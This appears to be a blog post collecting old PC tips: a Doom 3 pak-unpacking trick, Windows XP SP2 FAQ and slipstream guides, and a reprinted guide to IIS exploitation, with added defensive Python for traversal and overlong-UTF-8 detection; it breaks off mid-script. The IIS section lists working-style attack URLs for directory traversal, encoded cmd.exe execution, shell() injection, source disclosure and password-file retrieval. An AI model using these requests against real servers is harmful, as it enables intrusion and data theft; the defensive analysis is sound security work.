Monday, February 21, 2011

Improve Doom 3's Performance
A simple but efficient trick for everyone!

"The Catalyst 4.9 beta drivers are a sneak peek into future drivers that ATI is continuously working on. They were released mainly for the OpenGL component update, targeting improved Doom3 performance. Having said that, newer generations of hardware will get the most benefit from this driver (X800* series). While I haven't done specific benchmarks, X800 users can see performance increase of 5~30%, depending on the level and the system/hardware type. Regretfully, older hardware, such as 9700's and even 9800's will not get as much benefit. And if paired with a slower system (or with less memory) might see +/- performance improvements."

Source: www.Teamradeon.com

There is a boost, but don't expect miracles. With that said, give this a read:

As all of you who already have this game have noticed, the game is very slow even on new computers.

I found out the reason for this and the solution to fix this problem.

As you already know, after installation the game consists only of doom3.exe and some .PK4 files. Those PK4 files include the entire game (sounds, videos, textures etc.) in highly compressed form.

Normally those files are decompressed during the game.

But this exactly is the problem. Even new CPUs are not able to decompress those files while running the game with good performance, and therefore the game runs very **** even on new computers. I don't know if the developers at
ID-Soft were just too stupid to think about this or if they have an agreement with some hardware manufacturing firms.

How to get around this problem:

It is very simple. Go to your Doom 3 installation directory and get inside the folder "Base". There are some .PK4 files; you have to open each of them with WinRAR 3.3 and extract their entire contents to the Base dir in your Doom 3 installation folder (replace all files if there are any duplicates). Now you have to delete all .PK4 files in the Base folder to prevent the game from using those compressed files again.

Now the game starts and runs much faster!!!

Have fun playing Doom 3!!!

It supposedly gives a small performance boost and improves some load times.

This is a guaranteed way to get a MASSIVE performance increase in your game, at the expense of taking up a little more hard drive space (2 gigs approx). I went from running low quality at 800x600 to running High Quality at 1024x768. This improves load times AND framerate/details.

There is a catch! By doing this, you temporarily can't connect to pure multiplayer servers. You have been warned (I'll tell you how to revert it at the end)

After installation, the Doom III folder consists only of doom3.exe and some .PK4 files. Those PK4 files include the entire game (sounds, videos, textures etc.) compressed. They are normally uncompressed mid-game, which is very hard on your CPU. Let's fix this!

1. Make a copy of ALL the files in C:\Program Files\Doom 3\base. This is some big filage, but if you want to revert to MP without reinstalling you need to do it.

2. Unrar the following .pk4 files (just pretend they are .rar's and open them with winrar) into the C:\Program Files\Doom 3\base folder (each one should unrar a single folder such as textures or models):

pak000.pk4
pak001.pk4
pak002.pk4
pak003.pk4
pak004.pk4 (This one has many files; put them all in \Base and overwrite any that apply.)

3. Now delete the files above (pak000-004) or move them to another folder for storage so you can revert to multiplayer.

When you want to revert to multiplayer, restore everything you had before and get rid of the new stuff. I'm not sure if the folder "maps" is the same or not, so make sure you back that up.

When in normal mode, you should have "maps", "savegames", "config.spec", "doomConfig.cfg", "doomkey", "game00.pk4" and "gamex86.dll", nothing else. ALSO! If you open DoomConfig.cfg (C:\programfiles\doom3\base) in Notepad and change

seta image_cacheMegs "32"

to a higher number, such as 96 or 128, you will see a big increase too. Go for it bad boys!"
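The three steps above (back up base, unpack the paks, set the paks aside), written out as an added Python script that is not from either of the quoted posts. A .pk4 is an ordinary zip archive, so the script uses the standard library instead of WinRAR; unlike a blind extract, it also refuses any archive entry whose path would land outside the base directory (a "zip slip" entry). The base and backup directories are passed in by the caller; the pak names are the ones the post lists.

```python
import shutil
import zipfile
from pathlib import Path

# Pak names from the post; the Doom 3 base directory is passed in by the caller
# (the post's example is C:\Program Files\Doom 3\base).
PAK_NAMES = ["pak000.pk4", "pak001.pk4", "pak002.pk4", "pak003.pk4", "pak004.pk4"]


def is_within(child, parent):
    """True when child resolves to a location under parent, i.e. no '..' escape."""
    try:
        Path(child).resolve().relative_to(Path(parent).resolve())
        return True
    except ValueError:
        return False


def unpack_paks(base, backup, pak_names=PAK_NAMES):
    """Steps 1-3 of the post: copy base/ to backup/ (so multiplayer can be
    restored without reinstalling), extract each pak into base/ in order
    (later paks overwrite earlier ones, as the post says), then delete the
    paks from base/ so the game stops reading the compressed copies.
    Returns what was extracted and which archive entries were refused."""
    base, backup = Path(base), Path(backup)
    shutil.copytree(base, backup, dirs_exist_ok=True)  # step 1

    extracted, refused, removed = [], [], []
    for name in pak_names:
        pak = base / name
        if not pak.is_file():
            continue
        with zipfile.ZipFile(pak) as zf:            # a .pk4 is a zip archive
            for entry in zf.infolist():
                target = base / entry.filename
                # Zip-slip guard: never write an entry whose path leaves base/.
                if not is_within(target, base):
                    refused.append(entry.filename)
                    continue
                if entry.is_dir():
                    target.mkdir(parents=True, exist_ok=True)
                    continue
                target.parent.mkdir(parents=True, exist_ok=True)
                with zf.open(entry) as src, open(target, "wb") as dst:
                    shutil.copyfileobj(src, dst)     # step 2, overwriting duplicates
                extracted.append(entry.filename)
        pak.unlink()                                 # step 3; the backup still has it
        removed.append(name)
    return {"extracted": extracted, "refused": refused, "removed": removed}


if __name__ == "__main__":
    import sys
    # usage: python unpack_paks.py <base dir> <backup dir>
    print(unpack_paks(sys.argv[1], sys.argv[2]))
```

To revert, copy the backup back over base and delete the unpacked folders, as the post describes; the refused list should be empty for the retail paks, and anything in it is worth a look before trusting the archive.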


Keep me informed if one of you manages to test it sometime today.

Other stuff I found:

http://www.ocfaq.com/softmod/bios.php

BIOS files to flash your ATI cards

http://www.anandtech.com/cpuchipsets/showdoc.aspx?i=2149&p=3

Explanation of how to run the DOOM 3 benchmark demo

Important FAQs for SP2

Refer to this site for SP2 FAQs.

Questions like:

Should I slipstream SP1 into Windows XP before SP2? Nope!


View them here:

hXXXp://www.ntu.edu.sg/CITS/getting+help/faqs/windows+xp+sp2.htm#q4

Windows XP SP2 (Service Pack 2) Frequently Asked Questions

What is the size of this Windows XP SP2?
What is the minimum requirement for the system to run Windows XP SP2?
Can I upgrade my system with Windows XP SP2?
Do I have to install an earlier Service Pack 1 before installing Windows XP SP2?
Is there any patch that is required to install prior to SP2 installation?
Where can I download (and install) a copy of Windows XP SP2?
Is there any application that has compatibility issues with Windows XP SP2?
What are the patches found in this Windows XP SP2?
What is new in Windows XP SP2?
How do I install Windows XP SP2?
What is this so called Windows Firewall?
How do I know that the Windows Firewall is enabled in my system?
Can I disable the Windows Firewall?
With Windows Firewall turned on, do I still need to have anti-virus software installed on my computer?
My computer stops responding when I restart to complete the installation of Windows XP Service Pack 2. What should I do?
I receive a "Stop: c0000135" and "winsrv was not found" error message after I install Windows XP Service Pack 2?
After installing SP2 and reboot my system, I receive this message "Your network administrator can unblock this program for you". Why is this so and what should I do?
When I am surfing to some websites using Internet Explorer, I notice that Internet Explorer does not display some of the pop-up windows? Why is this so and what should I do to display these pop-up windows?


What is the size of this Windows XP SP2?
The size of Windows XP SP2 (Service Pack 2) is about 270MB.


What is the minimum requirement for the system to run Windows XP SP2?
You need a PC running Microsoft Windows XP with at least a 233-MHz processor, 64 MB of RAM and 1.6GB of available hard-disk space during installation.


Can I upgrade my system with Windows XP SP2?
If you are using any application/software provided by your School, do a quick check with your School IT Support on whether that application/software can run on Win XP SP2. Thereafter, proceed to the next question below.

Note: Before installing Windows XP SP2, it is strongly recommended that you back up or make a copy of your data files.

Do I have to install an earlier Service Pack 1 before installing Windows XP SP2?
No.

Is there any patch that is required to install prior to SP2 installation?
Microsoft has issued a critical patch (KB885523) that will resolve a compatibility issue with a non-Microsoft software application installed on your computer. Download and install this patch prior to the installation of SP2. This download can be found at:

http://www.microsoft.com/downloads/details.aspx?amp;displaylang=en.&familyid=65875203-CF1B-4D32-8F32-E00D004659F6&displaylang=en

Microsoft has issued a non-security critical update (KB885626) that will help to resolve an issue where a limited number of systems running a BIOS without production support for Intel Pentium 4 and Intel Celeron D processors based on Prescott C-0 stepping can potentially hang during Windows XP Service Pack 2 installation. This download can be found at:

http://support.microsoft.com/default.aspx?scid=kb;[LN];885626

Where can I download (and install) a copy of Windows XP SP2?
You can download a copy of Windows XP SP2 from one of the following methods:
a. Microsoft Download Site
b. Windows Update
c. Automatic Update
d. CD Order Process from Microsoft
e. CITS Software Directory

Is there any application that has compatibility issues with Windows XP SP2?
Microsoft has published a list of programs that are known to experience a loss of
functionality when running on Windows XP SP2. Click here for more details.

There is also a list of programs that may stop working after installing Win XP SP2.
Click here for the details.

What are the patches found in this Windows XP SP2?
Please refer to the following Microsoft sites for the updates:
a. Security patches
b. Fixes

What is new in Windows XP SP2?
This SP2 has improved security technologies that will withstand attacks by malicious viruses and worms. These technologies include:
a. Network protection (protection against malicious attacks)
b. Memory protection (prevents buffer overruns)
c. E-mail handling (improved attachment control using the AES API)
d. Browsing security (locks down the Local Machine zone and turns on the pop-up blocker)
e. Computer maintenance (keeps the computer updated with the latest security updates)

For greater detail, please refer to the Microsoft site here.

How do I install Win XP SP2?
After you have downloaded the Win XP SP2, the Setup Wizard will appear.
a. Note: Remember to protect or back up all data files
b. In the 'Welcome to Windows XP Service Pack 2 Setup Wizard', click Next.
c. In the 'License Agreement', select 'I Agree' and click Next.
d. In the next screen for 'Uninstalled Folders', click Next to proceed.
e. The system will proceed to do the inspection of your current configuration, archive your current files and update your files. This will take quite a while, so please wait patiently.
f. At the end of the installation, click Finish and this will reboot your system.
g. After rebooting, a firewall option screen may appear. Select the 'ON' radio button to proceed with turning on the Windows Firewall.
h. Ensure that the security essentials are all turned ON (by clicking Start -> Control Panel -> Security Center)

What is this so called Windows Firewall?
Windows Firewall (previously known as Internet Connection Firewall or ICF in Win XP) is a software-based, stateful filtering firewall for Microsoft Windows XP.

After the Win XP SP2 installation, this Windows Firewall is turned on by default.

Windows Firewall provides protection for computers that are connected to a network by preventing unsolicited inbound connections through TCP/IP. The configuration options include:
a. Enabling static exceptions for ports
b. Enabling exceptions for applications
c. Configuring basic ICMP options
d. Logging dropped packets and successful connections

How do I know that the Windows Firewall is enabled in my system?
Go to the Control Panel, click Security Center and check that the Firewall is ON.

Alternatively, if you open up the LAN connection icon, you will notice a lock symbol being shown.

Can I disable the Windows Firewall?
You can manually turn it off if you have administrator rights. However, it is advisable to leave it on in order to minimize virus, worm or trojan attacks.

With Windows Firewall turned on, do I still need to have anti-virus software installed on my computer?
Even with Windows Firewall turned on, it is still necessary to have anti-virus software installed on the computer. Windows Firewall is NOT a replacement for anti-virus software but acts as a complement to it.

My computer stops responding when I restart to complete the installation of Windows XP Service Pack 2. What should I do?
This issue may occur if either (1) your computer uses an Intel Pentium 4 or Intel Celeron D processor that is based on the Prescott C-0 processor stepping or (2) your computer has a BIOS version that is out of specification.

Contact your computer manufacturer for an updated version of the BIOS that provides production support for the processor that is installed in your computer, or refer to the Microsoft article at http://support.microsoft.com/default.aspx?scid=kb;[LN];885626 for resolution.

I receive a "Stop: c0000135" and "winsrv was not found" error message after I install Windows XP Service Pack 2?
This problem may occur if either (1) T.V. Media (TvMedia.tvmbho) from Total Velocity Corporation is installed on your computer, or (2) Critical Update 885523 is not installed, or (3) you tried to install Windows XP SP2.

Refer to the Microsoft article at http://support.microsoft.com/?kbid=885523 for resolution.

After installing SP2 and reboot my system, I receive this message "Your network administrator can unblock this program for you". Why is this so and what should I do?
This is because you are not the administrator of this system. You should use an administrator account to log in to unblock this program.
After logging in as an administrator, you can choose to 'Keep Blocking' this program, 'Unblock' this program, or 'Ask Me Later' when you run that program again, as shown below.

When I am surfing to some websites using Internet Explorer, I notice that Internet Explorer does not display some of the pop-up windows? Why is this so and what should I do to display these pop-up windows?
When you install SP2, the pop-up blocker is turned on in Internet Explorer. It will block most automatic pop-ups, but it will play a sound and show the Information Bar when a pop-up is blocked, as shown below.

To temporarily or always allow pop-ups from that website, click the Information Bar when it notifies you that a pop-up has been blocked. Choose the correct setting as shown below.

If you choose to 'Always Allow Pop-ups from This Site', it will prompt you to confirm again to permanently trust this website to allow pop-ups. Click 'Yes' if you are sure.

Guide to Slipstreaming Service Pack 2
DarkLegacy's Guide to Slipstreaming Service Pack 2

Note: All images are hosted with ImageShack.

• This guide will allow you to successfully install Service Pack 2 on the original (gold) code of Microsoft Windows XP.
• The version of Windows you have purchased/downloaded does not matter as far as slipstreaming (they're all the same anyway).

Things you need:
• Microsoft Windows XP (duh :P)
• Service Pack 2:

http://download.microsoft.com/download/1/6/5/165b076b-aaa9-443d-84f0-73cf11fdcdf8/WindowsXP-KB835935-SP2-ENU.exe

• Windows XP Boot sector:

http://www.neowin.net/downloads/xpboot.bin

• Nero Burning Rom (find it on SoD)

Step One

Insert the Microsoft Windows XP CD into your CD-ROM drive, and create a new folder on your hard-drive labelled "CD".

Copy all of the files from the Windows XP CD to the "CD" folder.




Step Two

Download Service Pack 2 and place it within the root of your hard-drive.
Ex: C:\ D:\ etc..



Step Three

Go to Start -> Run and type in "F:\WindowsXP-KB835935-SP2-ENU.exe -s:F:\CD" (depending on where you put the folder)

The actual command is -s:drive:\folder



Step Four

The Service Pack 2 updater will automatically slipstream Service Pack 2 into your "CD" folder.




Step Five

If you browse back to the CD folder, you'll notice that new folders and files appeared from the SP2 update. At this point, you can include any software you wish onto this CD, but make sure that the size of the folder does not exceed the media you are burning on. If you're not sure, a regular CD is 700 megabytes.



Step Six

Go to Start and Search for files and folders. Go to all files and folders, and type in "wpa.dbl". This is the activation file for your current installed version of XP. Make a copy of the file and paste it into your CD folder.



Step Seven

Open up Nero Smartstart, and click on the icon that looks like two people. This turns the program into "professional mode". Search for create a bootable CD. Click on it, and make sure that your settings agree with the following picture; also make sure that you downloaded the Windows XP boot sector.



Step Eight

Continue onto the next tab, and make sure that your settings agree with the picture:



Step Nine

In this step, you can label your CD whatever the hell you want. I recommend WXPSP2_EN.


Step Ten

Go to "new" and locate your CD folder. Drag all of the files in the CD folder to the compilation window on the right, and Nero will calculate how much disk space was used. If it exceeds 700 MB, get rid of some programs that you added to the CD. If you didn't add anything, just push burn.


Step Eleven

Make sure that your settings check with the picture:



Step Twelve

Just push burn, and that's it! Congratulations, you just made a bootable Win XP CD with SP2 slipstreamed!


Guide to IIS Exploitation

***************************************************************************
*                       Guide to IIS Exploitation                         *
*                            by fugjostle                                 *
*                                                                         *
*                               V.1.0.1                                   *
*                                                                         *
*          Questions? Comments? Email: fugjostle at ch0wn.com             *
***************************************************************************

Disclaimer: I do not condone hacking IIS servers in any way, shape or form. This guide is intended as a guide for admins to help them understand what most script kiddies don't understand but are happy to exploit.


--[On the first day, God created directory traversal]

Relative paths are the developer's friend. They allow an entire website to be moved to another directory without the need to change all the links in the HTML. For example, let's say we have a webpage called 'pictures.html' in the htdocs dir:

Absolute path: /home/webpages/htdocs/pictures.html
Absolute path: /home/webpages/images/pic1.gif

In the html you can refer to the 'pic1.gif' via an absolute path shown above or use a relative path:

Relative path: ../images/pic1.gif

The relative path tells the server that it has to go to the parent directory (dot dot) --> from /home/webpages/htdocs to /home/webpages. Then the server goes into the images dir and looks for the gif file to display.

Anyone who has used the 'cd' command in DOS and *nix should be familiar with the operation. So what's the problem, I hear you ask... well, the programmers of the web server didn't think to check the supplied URL to ensure that the requested file was actually in the web directory. This allows someone to backtrack through the server's directory structure and request files that the web server has access to. For example,

http://www.target.com/../../../etc/passwd

NB. you can also use double dots and double quotes. This is useful to evade
Intrusion Detection Systems (IDS):

http://www.target.com//....//....//...././etc/./passwd

The webserver simply strips the extra stuff out and processes the request.
This is the same as the previous example and can make string-matching IDSs
work for their money.


--[On the second day, God created Hexadecimal]

Once programmers started to realise the mistake they began to create parser
routines to check for naughty URLs and keep the requests within the
document root. Then along comes a wily hacker who wonders whether, by encoding
the URL, it will still be recognised by the parser routines.

You may have noticed that when you enter a URL that includes a space it is
replaced with the hex equivalent (%20):

http://www.target.com/stuff/my index.html

becomes

http://www.target.com/stuff/my%20index.html

and voila, it works. So what would happen if we changed the now denied URL:

http://www.target.com/../../../etc/passwd

to

http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd

The parser routine checks for the existence of dots in the path and finds
none... the webserver then proceeds with the request.

An interesting feature is that you can encode the hex symbol and the web
server will decode it all for you. This is called the "double decode".
For example, given the URL "http://victim.com/..%252f..%252fdocs/", the
following will take place:

(1) On the first decode, the string will be converted to:

"http://victim.com/..%2f..%2fdocs/"

[%25 = '%' so '%252f' is decoded to '%2f']

(2) On the second decode, the string will be converted to:

"http://victim.com/../../docs/"

[%2f = '/']
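As an added example (not part of fugjostle's guide), here is the check a parser that has learned the lessons of days one and two should make. Decoding is repeated until the path stops changing, so a request that needs a second pass is flagged as double-encoded; the path is then joined to the document root before it is normalised, so leading '..' segments walk up out of the root and are caught instead of being silently discarded. The document root `/home/webpages/htdocs` is taken from the guide's own example; the request list is constructed from the URLs above.

```python
import posixpath
from urllib.parse import unquote

# Document root from the guide's first example; an assumption for this demo.
DOCROOT = "/home/webpages/htdocs"


def decode_rounds(path, max_rounds=4):
    """Percent-decode until the string stops changing. Returns the decoded
    path and the number of rounds needed: a normal client request needs
    at most one, so two or more means the request was double-encoded."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def resolve_request(url_path, docroot=DOCROOT):
    """Decode, then join to the docroot and normalise *after* joining, so that
    leading '..' segments really walk up the tree instead of being dropped;
    the result is allowed only if it stays under docroot and the request
    needed no more than one decoding round."""
    decoded, rounds = decode_rounds(url_path)
    # IIS treats backslash as a separator too; normalise it before checking.
    candidate = decoded.replace("\\", "/").lstrip("/")
    resolved = posixpath.normpath(posixpath.join(docroot, candidate))
    inside = resolved == docroot or resolved.startswith(docroot + "/")
    return {
        "decoded": decoded,
        "double_encoded": rounds > 1,
        "resolved": resolved,
        "allowed": inside and rounds <= 1,
    }


# Constructed requests: the guide's examples plus the legitimate space-encoded one.
REQUESTS = [
    "/stuff/my%20index.html",
    "/../../../etc/passwd",
    "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "/..%252f..%252fdocs/",
]

if __name__ == "__main__":
    for req in REQUESTS:
        print(req, "->", resolve_request(req))
```

Note the order of operations: a check that only looks for ".." in the raw request string would pass the `%2e%2e` form, and a check that normalises the request path on its own before joining would turn `/../../../etc/passwd` into `/etc/passwd` under the docroot and pass it.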


--[On the third day, God created Unicode]

The World Wide Web is a global phenomenon and as such needs to be globally
interoperable. This raised the question of how to deal with all the different
character sets around the world. As a response to this, Unicode was created:

-----------------------------------------------------------------
Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. The Unicode Standard has been adopted by such industry leaders as Apple, HP, IBM, JustSystem, Microsoft, Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is required by modern standards such as XML, Java, ECMAScript (JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official way to implement ISO/IEC 10646. It is supported in many operating systems, all modern browsers, and many other products.
-----from http://www.unicode.org---------------------------------


The problem with Unicode is that it requires 16 bits for a single character
and software tended to use 8 bits for a single character. Unicode Transformation
Format, 8-bit (UTF-8) was created. This allows for multibyte encoding where a
variable number of bytes can be used for each character:

Character   1-byte   2-byte   3-byte
.           2E       C0 AE    E0 80 AE
/           2F       C0 AF    E0 80 AF
\           5C       C1 9C    E0 81 9C

This led to a new vulnerability in certain webservers. The parser didn't
understand this new encoding and allowed it through :-)

For example:

www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd

Recent vulnerabilities have been taking advantage of the fact that the web
server doesn't understand the Unicode UTF-8 character set but the underlying
OS does:

www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir

Understanding the distinction between Unicode and UTF-8 can be difficult. As
a general rule of thumb you can use the following format as a guide:

%uxxxx = Unicode
%xx%xx = UTF-8
%xx = Hexadecimal
%xxxx = Double Decode
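Added example, not from the guide: the table above turned into a detector. `find_overlong` walks raw UTF-8 sequences and reports any that spend more bytes than the shortest encoding of the code point, which is exactly what `%C0%AE` and `%E0%80%AE` do for '.'; `scan_log` runs it over constructed log lines in a W3C-style layout (the field order is an assumption for this example) and reports which characters were smuggled in overlong form. `strict_decoder_rejects` shows that a conforming decoder refuses these sequences outright, which is the behaviour the affected parsers lacked.

```python
import re

PCT = re.compile(r"%([0-9A-Fa-f]{2})")


def percent_decode_bytes(path):
    """Turn %xx escapes into raw bytes and leave everything else as-is.
    The bytes are deliberately not interpreted as text yet: that is the
    step where an overlong sequence does its damage."""
    out = bytearray()
    i = 0
    while i < len(path):
        m = PCT.match(path, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
        else:
            out.extend(path[i].encode("latin-1", "replace"))
            i += 1
    return bytes(out)


def find_overlong(data):
    """Walk UTF-8 sequences and return (offset, raw bytes, character) for each
    one that uses more bytes than the shortest encoding of its code point.
    C0 AE and E0 80 AE both decode to '.', but only 2E is legal UTF-8."""
    hits, i = [], 0
    while i < len(data):
        lead = data[i]
        if lead < 0x80:
            i += 1
            continue
        if 0xC0 <= lead <= 0xDF:
            cont, cp = 1, lead & 0x1F
        elif 0xE0 <= lead <= 0xEF:
            cont, cp = 2, lead & 0x0F
        elif 0xF0 <= lead <= 0xF7:
            cont, cp = 3, lead & 0x07
        else:
            i += 1          # stray continuation byte, nothing to decode
            continue
        seq = data[i:i + 1 + cont]
        if len(seq) < 1 + cont or any(not 0x80 <= b <= 0xBF for b in seq[1:]):
            i += 1          # truncated or malformed sequence
            continue
        for b in seq[1:]:
            cp = (cp << 6) | (b & 0x3F)
        shortest = 1 if cp < 0x80 else 2 if cp < 0x800 else 3 if cp < 0x10000 else 4
        if shortest < 1 + cont:
            hits.append((i, bytes(seq), chr(cp)))
        i += 1 + cont
    return hits


def strict_decoder_rejects(data):
    """A conforming decoder (Python's here) refuses overlong forms outright;
    the servers in the guide accepted them, which is the whole bug."""
    try:
        data.decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True


# Constructed log lines in a W3C-style layout (assumed field order):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = [
    "2001-09-18 10:01:02 10.0.0.5 GET /default.htm - 200",
    "2001-09-18 10:01:07 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200",
    "2001-09-18 10:01:09 10.0.0.5 GET /%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd - 404",
    "2001-09-18 10:01:11 10.0.0.5 GET /caf%C3%A9.html - 200",
]


def scan_log(lines):
    """Return (uri-stem, characters hidden in overlong form) for flagged lines."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        stem = fields[4]
        hits = find_overlong(percent_decode_bytes(stem))
        if hits:
            findings.append((stem, "".join(ch for _, _, ch in hits)))
    return findings


if __name__ == "__main__":
    for stem, hidden in scan_log(SAMPLE_LOG):
        print(stem, "-> overlong-encoded:", repr(hidden))
```

The fourth sample line (`%C3%A9`, a legitimate two-byte é) is there to show the detector does not fire on ordinary non-ASCII file names; only the shortest-form rule is checked.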

--[On the fourth day, God created default installs]

IIS comes installed with various DLLs (Dynamic Link Libraries) that
increase the functionality of the web server. These ISAPI (Internet Server
API) applications allow programmers/developers to deliver more functionality
to IIS.

The DLLs are loaded into memory at startup and offer a significant speed advantage
over traditional CGI programs. For example, they can be combined with the
Internet Database Connector (httpodbc.dll) to create interactive sites that
use ODBC to access databases.

The problem is that some of these DLLs are insecure and are often installed
with sample scripts that demonstrate how to exploit, erm, I mean use them.

ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active
Server Pages) are basically HTML pages with embedded code that is processed
by the webserver before serving it to the client.

Here are some examples to illustrate how the sample pages installed by default
can aid someone breaking into your site via ASP.DLL:
[prefix all the examples with http://www.target.com]

/default.asp.

** Appending a '.' to the URL can reveal the source
** on older systems. Remember hex encoding? You can
** also try using %2e to do the same thing.

/msadc/samples/adctest.asp

** This gives you an interface into msadcs.dll
** and allows creation of DSNs. Read RFP's stuff
** for ideas on how to exploit this.

/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini
/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini

** You can view the source of anything in the
** document root. '/msadc/' needs to be in the
** request as it is checked for, wait for this,
** security :-)

/index.asp::$DATA

** Appending '::$DATA' to the URL can reveal
** the source of the ASP.

/index.asp%81

** Append a hex value between 0x81 and 0xfe
** and you can reveal the source of any server
** processed file. This only works on servers
** that are Chinese, Japanese or Korean.

/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|

** This one allows you to execute remote
** shell commands ;-)

ISM.DLL is used to process requests that end in ".htr". These pages were used
to administer IIS3 servers. In IIS4 they are not used but various .htr samples
are installed by default anyway and offer another avenue for entry.

/index.asp%20%20%20..(220 more)..%20%20.htr

** IIS will redirect this request to ISM.DLL,
** which will strip the '.htr' extension and
** deliver the source code of the file.

/global.asa+.htr

** Does the same thing as the %20%20 exploit
** above. ISM.DLL strips the +.htr and delivers
** you the source of the file

/scripts/iisadmin/ism.dll?http/dir

** Excellent brute force opportunity if the
** dll exists. Successful logons will reveal
** lots of useful stuff.

/iisadmpwd/aexp.htr

** The iisadmpwd directory contains several .htr
** files that allow NetBIOS resolution and
** password attacks.

/scripts/iisadmin/bdir.htr??c:\inetpub\www

** This method will only reveal directories
** but can be useful for identifying the
** server's structure for more advanced
** attacks later.

MSADCS.DLL is used to allow access to ODBC components via IIS using RDS
(Remote Data Service). RDS is part of the default install of Microsoft Data
Access Components (MDAC) and is commonly exploited on IIS. It can allow
arbitrary shell commands to be executed with system privileges.

/msadc/msadcs.dll

** If this file exists then there's a pretty
** good chance that you can run the RDS
** exploit against the box. More on this later.

HTTPODBC.DLL is the Internet Database Connector (IDC) and is used when the web
server wants to connect to a database. It allows the creation of web pages
from data in the database, and it allows you to update/delete items from
within webpages. Pages with the extension '.idc' are sent to HTTPODBC.DLL
for processing.

/index.idc::$DATA

** Appending '::$DATA' to the URL can reveal
** the source of the IDC.

/anything.idc

** Requesting a non-existent file will
** reveal the location of the web root.

/scripts/iisadmin/tools/ctss.idc

** Creates a table based on the parameters it
** receives. Excellent place to look at for
** SQL injection.

SSINC.DLL is used for processing Server Side Includes (SSI). '.stm',
'.shtm' and '.shtml' extensions are sent to the DLL, which interprets
the SSI statements within the HTML before sending it to the client.

An example of SSI would be:



This SSI tells the server to include 'news.txt' in the final HTML
sent to the user. SSI statements are beyond the scope of this document
but offer another security hole open to our wily hax0r. Ensure you
remove the app mapping and disable SSI if you do not require its
functionality.

SSINC.DLL is also vulnerable to a remote buffer overflow, read the
following advisory for details:

http://www.nsfocus.com/english/homepage/sa01-06.htm

Some examples of SSINC.DLL fun:

/anything.stm

** If you request a file that doesn't exist
** then the server error message contains
** the location of the web root.

/somedir/anything.stm/somedir/index.asp

** Using this method allows you to view
** the source code for index.asp.

IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'
requests. This DLL has had some big exposure with the recent Nimda worm.
I'm not going into too much detail, but '.ida' was used in a buffer
overflow that resulted in user-defined code being executed on the server.

/anything.ida or /anything.idq

** Requesting a non-existent file will
** reveal the location of the web root.

/query.idq?CiTemplate=../../../boot.ini

** You can use this to read any file on
** the same drive as the web root

CPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your
IIS server via a web browser or the Web Publishing Wizard. The existence of
this DLL can allow attackers to upload files to the server. Other files such as
uploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with Site
Server and allow upload of documents to the server:

/scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp

** If this file is there then you may be able
** to upload files to the server.

/scripts/uploadn.asp

** Connecting to this page gives you a nice
** gui for uploading your own webpages. You
** probably need to brute the userid.

There are lots more example scripts in the default install and quite a few
of them are very, very insecure. Microsoft recommends that you remove ALL
samples from any production server including the ExAir, WSH, ADO and other
installed samples.

IIS Default Web Site
--------------------
IISSAMPLES - c:\inetpub\iissamples
IISADMIN - c:\winnt\system32\inetsrv\iisadmin
IISHELP - c:\winnt\help
SCRIPTS - c:\inetpub\scripts
IISADMPWD - c:\winnt\system32\inetsrv\iisadmpwd
msadc - c:\program files\common files\system\msadc
logfiles - c:\winnt\system32\logfiles
default.htm - c:\inetpub\wwwroot

IIS Default App Mapping
-----------------------
.asa - c:\winnt\system32\inetsrv\asp.dll
.asp - c:\winnt\system32\inetsrv\asp.dll
.cdx - c:\winnt\system32\inetsrv\asp.dll
.cer - c:\winnt\system32\inetsrv\asp.dll
.htr - c:\winnt\system32\inetsrv\ism.dll
.idc - c:\winnt\system32\inetsrv\httpodbc.dll
.shtm - c:\winnt\system32\inetsrv\ssinc.dll
.shtml - c:\winnt\system32\inetsrv\ssinc.dll
.stm - c:\winnt\system32\inetsrv\ssinc.dll


--[On the fifth day, God created Frontpage Extensions]

Microsoft Frontpage (originally developed by Vermeer Tech Inc, if you've
ever wondered why they use _vti_) is a web design tool that helps you
create and maintain a web site and allows you to publish it to the web
server.

In order to publish using Frontpage the server needs to run certain
programs, collectively called the Frontpage Server Extensions.

Sounds good I hear you say, but there are many, many security holes in
Frontpage. You can list all the files, download password files and upload
your own files on Frontpage enabled sites.

When you publish a file, Frontpage attempts to read the following URL to
get all the information it needs to publish:

http://www.myserver.com/_vti_inf.html

Then Frontpage uses the following URL to POST the files to the site:

http://www.myserver.com/_vti_bin/shtml.exe/_vti_rpc

It will come as no surprise that this file is not protected and is open to
abuse.

All information for the site is stored in the /_vti_pvt/ dir, and it's world
readable. Here are some of the things you can look for:

http://www.myserver.com/_vti_pvt/administrators.pwd
http://www.myserver.com/_vti_pvt/authors.pwd
http://www.myserver.com/_vti_pvt/service.pwd
http://www.myserver.com/_vti_pvt/shtml.dll
http://www.myserver.com/_vti_pvt/shtml.exe
http://www.myserver.com/_vti_pvt/users.pwd
http://www.myserver.com/_private
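The request shapes listed in the fourth and fifth days (default-install samples, the ISAPI source-disclosure tricks, RDS, iisadmpwd, the _vti_pvt password files) collected into one detection routine, as an added example that is not part of the guide. The tag names are made up for this example; each pattern is checked against the request as received and after one percent-decoding pass, so the `%2e` variants are caught too. The request list is constructed from the guide's own examples.

```python
import re
from urllib.parse import unquote

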